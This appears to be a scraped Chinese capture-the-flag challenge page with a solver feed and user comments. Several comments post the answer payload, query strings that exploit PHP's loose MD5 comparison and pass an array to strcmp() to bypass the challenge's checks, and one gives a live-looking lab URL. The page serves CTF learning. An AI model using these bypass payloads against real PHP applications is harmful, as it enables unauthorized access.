评分(11)
解题动态

xiayuan 攻破了该题 1小时前

Rookieeeee 攻破了该题 10小时前

卡卡罗特M 攻破了该题 13小时前

zhuzhu90 攻破了该题 15小时前

bugtest 攻破了该题 15小时前

神级菜鸟 攻破了该题 17小时前

hkxr 攻破了该题 23小时前

翻斗花园突破手 攻破了该题 1天前

yutou 攻破了该题 1天前

asdaosidasu 攻破了该题 1天前

15874086973 攻破了该题 1天前

18803687092 攻破了该题 1天前

YXW3 攻破了该题 2天前

蟹堡王第一厨师长 攻破了该题 2天前

2424291140 攻破了该题 2天前

17766114927 攻破了该题 2天前

jiubanyipeng 攻破了该题 2天前

laitya1 攻破了该题 2天前

2023201436 攻破了该题 2天前

评论
lordinglord 6天前
举报
http://117.72.52.127:19197/index.php?v1=QNKCDZO&v2=240610708&v3[]=a
emm不取名字了 16天前
举报
flag{*****}
3344 1月前
举报
flag{**********}
Arya32f 1月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=1或者/?v1[]=1&v2[]=2&v3[]=1
HK1ng 1月前
举报
首先CTRL+U查看源码,发现存在超链接,点击进去之后,代码审计,第一关是md5弱类型比较,然后用了strcmp()函数进行弱类型比较,直接传一个数组,PHP 8.0 前 strcmp() 会返回 null,加上取反,直接绕过。
goodsnack 1月前
举报
弱类型比较,传数组即可
harven 2月前
举报
http://example.com/?v1=QNKCDZO&v2=240610708&v3[]=test
smtall 2月前
举报
用deepseek做出来了
大棕兔爸爸 3月前
举报
存在两个漏洞点:1. md5的松散比较绕过;2. strcmp的类型漏洞导致比较结果为0。攻击者需要同时利用这两个漏洞才能获取到flag。 完整Payload: ?v1=240610708&v2=QNKCDZO&v3[]=abc
welltian 5月前
举报
/?v1=QNKCDZO&v2=240610708&v3[]=123